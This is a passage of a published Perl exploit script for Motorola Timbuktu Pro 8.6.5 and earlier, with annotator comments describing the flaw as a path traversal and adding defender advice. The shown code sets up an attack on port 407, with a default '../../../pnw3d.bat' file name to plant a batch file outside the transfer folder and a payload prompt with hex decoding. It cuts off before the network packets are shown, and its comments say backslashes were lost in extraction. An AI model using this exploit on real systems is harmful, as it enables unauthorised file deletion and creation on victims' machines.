
# Title : Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit
# Published : 2008-03-11
# Author : titon


#!/usr/bin/perl
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
# Timbuktu Pro <= 8.6.5 Arbitrary File Deletion/Creation
#
# Bug & Exploit by titon [titon{at}bastardlabs{dot}com]
#
# Advisory: 
# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590
#
# Copyright: (c)2007 BastardLabs
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
#
# Usage: $ ./timbuktu_sploit.pl 192.168.0.69 407
#
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
use IO::Socket;
use Time::HiRes qw(usleep);
##
## Author's note: the script assumes the service's working directory is
## C:\Program Files\Timbuktu Pro\N1 (backslashes restored here; the
## extracted page had dropped them).
##
## Both values below come from promptUser(), which is defined outside this
## excerpt; the two arguments look like (prompt label, default answer) --
## confirm against its definition.
##
## The default file name climbs out of that folder with "../" segments, so
## the file deletion/creation named in the title appears to be a path
## traversal: the receiving side uses a peer-supplied file name without
## confining it to its own transfer directory.
## Defender's view: limit reachability of the Timbuktu port (407 in the
## usage line above) to trusted hosts, apply any vendor update covering the
## linked advisory, and treat ".." sequences in transferred file names, or
## unexpected files outside the Timbuktu folder, as indicators.
##
$filename = &promptUser("Filename" ,"\../../../pnw3d.bat");
##$filename = &promptUser("Filename" ,"../../../pnw3d.bat");
$payload = &promptUser("Payload ","echo pwwwnnn333ddd !!");
##
## The payload may be plain text or binary; binary bytes are entered as
## two-digit hex escapes, which the substitution below turns into raw bytes
## with pack("C", hex($1)).
## NOTE(review): this listing lost backslashes in extraction, so the pattern
## may not read as the author wrote it; the line is kept exactly as published.
##
$payload =~ s/\x(..)/pack("C",hex($1))/egi;
##
## packet1 == a